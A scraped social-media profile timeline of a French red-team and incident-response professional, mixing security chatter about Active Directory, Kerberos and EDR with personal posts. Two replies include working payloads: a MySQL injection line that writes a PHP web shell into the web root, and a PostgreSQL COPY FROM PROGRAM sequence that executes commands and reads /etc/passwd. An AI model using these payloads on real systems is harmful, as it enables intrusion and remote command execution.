Jean Marsault

2.5K posts

Jean Marsault banner
Jean Marsault

Jean Marsault

@iansus

Red-Team & DFIR @WavestoneFR YoloSw4g CTF Opinions are my own

Paris, France Katılım Ağustos 2010
369 Takip Edilen1.4K Takipçiler
Jean Marsault
Jean Marsault@iansus·
@PyroTek3 That's why Tenant Restriction v2 does not only rely on SSL breakout for connections to GraphAPI but also provides a local agent to intercept requests before they're even sent to the SSL-encrypting layer.
English
0
0
4
501
spencer
spencer@techspence·
Scare a sysadmin in 6 words… Domain Admins can log into laptops
English
92
15
283
24.4K
AlertesInfos
AlertesInfos@AlertesInfos·
🚨🇺🇸🇮🇷☢️ ALERTE - Les États-Unis affirment qu’il ne faudrait que "deux semaines" à l’Iran pour fabriquer une bombe nucléaire. (Maison-Blanche)
AlertesInfos tweet mediaAlertesInfos tweet media
Français
932
482
8.3K
1.2M
Jean Marsault retweetledi
Yuval Gordon
Yuval Gordon@YuG0rd·
🚀 We just released my research on BadSuccessor - a new unpatched Active Directory privilege escalation vulnerability It allows compromising any user in AD, it works with the default config, and.. Microsoft currently won't fix it 🤷‍♂️ Read Here - akamai.com/blog/security-…
Yuval Gordon tweet media
English
22
372
879
165.4K
Jean Marsault
Jean Marsault@iansus·
@binitamshah How is "mshta calls VBS to download PS1" not flagged by every EDR out there?
English
0
1
4
496
Jean Marsault
Jean Marsault@iansus·
trying my luck here, has anyone struggled with "message stream modified" when trying to use a ccache file, valid with KfW, recognized by klist and usable by kinit / kvno, but a Java-based app fails with this error?
English
0
0
0
203
WaterBucket
WaterBucket@windeebug·
@OtterHacker For MYSQL: SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php'; Been using this for a while.. works most of the time if you got SQLi. Just slap a webshell on the target (not the smartest move, but hey, it works), and boom, you're in.
English
1
0
6
396
OtterHacker
OtterHacker@OtterHacker·
I'm in my database period RCE with PostgreSQL DROP TABLE IF EXISTS files; CREATE TABLE files(filename text); COPY files FROM PROGRAM 'cat /etc/passwd'; SELECT * FROM files ORDER BY filename ASC;
English
1
2
49
4.6K
OtterHacker
OtterHacker@OtterHacker·
I was today old when I learnt that you can't use a ST on a DC that generated it. It seems to be a security feature to avoid replay attack. But if you activate Protected User on a domain with one DC you basically just locked you down but prevent attacks through SID History...
English
1
4
27
3.5K
Jean Marsault retweetledi
OtterHacker
OtterHacker@OtterHacker·
A few months ago I've created a "Pefect DLL Loader". You can find some details on my article that was just published today ! The full implem can be found directly in the @defcon workshop in my github ! Hope you will learn something in this 😊 riskinsight-wavestone.com/en/2024/10/loa…
English
3
92
315
25.2K
Jean Marsault retweetledi
laxa
laxa@l4x4·
Thanks to a great article from @itm4n, I discovered a bypass to install vulnerable printer's drivers when low level users are allowed to install them on Windows allowing escalating privileges. He published a detailed explanation: itm4n.github.io/printnightmare…
English
0
65
216
14.6K
Jean Marsault
Jean Marsault@iansus·
@_nwodtuhs Congratz dude! Kudos for your previous work and I'm sure you'll keep rocking 💪
English
0
0
1
158
Charlie Bromberg « Shutdown »
After ~6y at Capgemini, a new chapter of my life is starting as freelancer ✨ Learned a ton, met amazing people, tackled big challenges. Grateful for everyone who supported me along the way. I'll focus on The Hacker Recipes & Exegol, and offer my skills to those needing it ✌️
English
15
10
156
9.2K
Jean Marsault
Jean Marsault@iansus·
Y'a que moi qui ai l'impression que le wifi SNCF c'est de pire en pire ? Et je vous dis pas si c'est vraiment des Mb et pas des Mo...
Jean Marsault tweet media
Français
1
0
1
683
Jean Marsault
Jean Marsault@iansus·
Va falloir expliquer ce qu'on appelle une cyber attaque hein, j'en ai déjà géré plusieurs dizaines, mais de la a en avoir 1 pour chaque paire d'humain sur la planète... 🤔 Ou alors 1 paquet malveillant (most likely DDoS) == une cyber attaque ? 01net.com/actualites/4-m…
Français
8
4
24
7.3K
Jean Marsault
Jean Marsault@iansus·
@gentilkiwi J'ai lu "ouvert et ferme a la fois" je me suis dit que tu tenais un truc. La socket de Schrodinger
Français
1
0
0
195
Jean Marsault
Jean Marsault@iansus·
@gentilkiwi Que ce soit pour la red ou la blue team ça m'a pas l'air très très efficace 👀
GIF
Français
1
0
0
437